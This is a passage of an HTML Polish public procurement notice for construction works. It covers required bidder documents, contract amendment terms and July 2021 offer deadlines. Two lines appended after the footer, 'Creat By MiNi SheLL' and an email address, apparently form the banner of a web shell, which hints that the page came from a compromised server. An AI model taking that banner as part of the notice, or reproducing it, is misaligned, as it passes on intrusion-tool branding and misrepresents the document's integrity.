którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Dokumenty te powinny być wystawione w terminach nie wcześniejszych niż<br/>podano powyżej.<br/>• <br/>oświadczenie wykonawcy, w zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności<br/>do tej samej grupy kapitałowej o treści ZAŁĄCZNIKA NR 4 do SWZ w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>• <br/>oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 ustawy pzp o treści ZAŁĄCZNIKA NR 3 do SWZ<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub<br/>sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych<br/>w art. 118 ustawy, przedstawienia podmiotowych środków dowodowych, wymienionych w niniejszym<br/>punkcie, dotyczących tych podmiotów - za wyjątkiem oświadczenia, w zakresie art. 108 ust 1 pkt 5<br/>ustawy pzp, o braku przynależności do tej samej grupy kapitałowej,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną tego<br/>ubezpieczenia określoną przez zamawiającego. Jeżeli z uzasadnionej przyczyny wykonawca nie może<br/>złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, o których mowa<br/>w niniejszym tiret wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający<br/>spsoób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu lub<br/>kryterium selekcji dotyczącego sytuacji ekonomicznej lub finansowej,<br/>• <br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane o treści<br/>ZAŁĄCZNIKA NR 7 do SWZ, oraz załączeniem dowodów określających czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>UWAGA: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych<br/>wykonywanych wspólnie z innymi wykonawcami, wykaz zawiera roboty budowlane, w wykonaniu<br/>• których wykonawca bezpośrednio uczestniczył<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych<br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami o treści ZAŁĄCZNIKA NR 8 do SWZ,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> wykonawca wpisany do urzędowego wykazu zatwierdzonych wykonawców lub wykonawca<br/>certyfikowany przez jednostki certyfikujące spełniające wymogi europejskich norm certyfikacji może,<br/>zamiast odpowiednich podmiotowych środków dowodowych, złożyć zaświadczenie o wpisie<br/>do urzędowego wykazu wydane przez właściwy organ lub certyfikat wydany przez właściwą jednostkę<br/>certyfikującą kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wskazujące<br/>na podmiotowe środki dowodowe stanowiące podstawę wpisu lub uzyskania certyfikacji, chyba że<br/>zamawiający ma uzasadnione podstawy do zakwestionowania informacji wynikających<br/>z zaświadczenia lub certyfikatu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> wykonawcy wspólnie ubiegajacy się o udzielenie zamówienia zobowiązani będą do złożenia - nie później niż na dzień przed terminem podpisania umowy w sprawie udzielenia zamówienia publicznego - kopii umowy o współpracy podmiotów działających wspólnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) zamawiający przewiduje możliwość zmiany umowy bez przeprowadzenia odrębnego postępowania<br/>o udzielenie zamówienia we wskazanych niżej przypadkach i pod następującymi warunkami:1. zmiany strony umowy w przypadku następstwa prawnego wynikającego z odrębnych przepisów,<br/>2. zmiany terminu wykonania umowy w przypadku:<br/>a) wystąpienia zdarzeń siły wyższej - o czas trwania przeszkody; w rozumieniu niniejszej umowy "siła wyższa"<br/>jest to zdarzenie nadzwyczajne, zewnętrzne wobec stron i niemożliwe do zapobieżenia, którego nie udało się<br/>uniknąć nawet w wypadku maksymalnej staranności stron; strona powołująca się na stan siły wyższej jest<br/>zobowiązana do niezwłocznego pisemnego powiadomienia drugiej strony, a następnie do udokumentowania<br/>zaistnienia tego stanu;<br/>b) wystąpienia robót zamiennych lub dodatkowych, uniemożliwiających wykonanie przedmiotu umowy<br/>w terminie umownym,<br/>c) wydania decyzji przez służby konserwatorskie lub nadzoru budowlanego, mające wpływ na wykonanie<br/>przedmiotu umowy,<br/>d) wycofania z rynku lub zakończenia produkcji materiałów lub urządzeń, których użycie przewidziano w toku<br/>realizacji przedmiotu umowy i konieczności zastąpienia ich innymi, o ile mają wpływ na wykonanie przedmiotu<br/>umowy,<br/>e) wystąpienia okoliczności leżących po stronie Zamawiającego, uniemożliwiających rozpoczęcie, wykonanie<br/>w terminie lub kontynuowanie wykonywania przedmiotu umowy,<br/>3. zmiany materiałów i urządzeń, których użycie przewidziano w toku realizacji przedmiotu umowy,<br/>w przypadku wycofania ich z rynku lub zakończenia ich produkcji, jak również w przypadku możliwości<br/>zastąpienia tych materiałów i urządzeń, innymi o lepszych parametrach technicznych i wyżej zaawansowanych<br/>technicznie i technologicznie,<br/>4. zmiany sposobu wykonywania umowy:<br/>a) spowodowanych siłą wyższą w rozumieniu ust. 1 pkt 2) lit. a), uniemożliwiającą wykonanie umowy zgodnie<br/>z jej postanowieniami,<br/>b) w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie<br/>można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy<br/>w celu jednoznacznej interpretacji jej zapisów przez strony umowy,<br/>c) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa, w tym prawa miejscowego<br/>w zakresie mającym wpływ na wykonanie umowy.<br/>5. Zmiany terminu wykonania umowy i/lub zmiany wynagrodzenia w przypadku:<br/>a) zawieszenia, rezygnacji przez Zamawiającego wykonania części robót i wynikającej z tego zmiany terminu<br/>wykonania robót, wartości wynagrodzenia umownego.Zamawiający zobowiązuje się do realizacji zamówienia<br/>w zakresie co najmniej 80%.<br/>b) rezygnacji z wykonania części robót i/lub wykonanie robót zamiennych oraz wynikającej z tego zmiany<br/>terminu wykonania robót i wartości wynagrodzenia umownego<br/>c) podpisania aneksu o roboty dodatkowe, o których mowa w art. 455 ust. 1 pkt 3 ustawy Prawo zamówień<br/>publicznych, nie objętych zamówieniem podstawowym,<br/>2) Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę<br/>i nie stanowią zobowiązania Zamawiającego do wyrażenia takiej zgody <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">przy użyciu miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-09 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-06</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com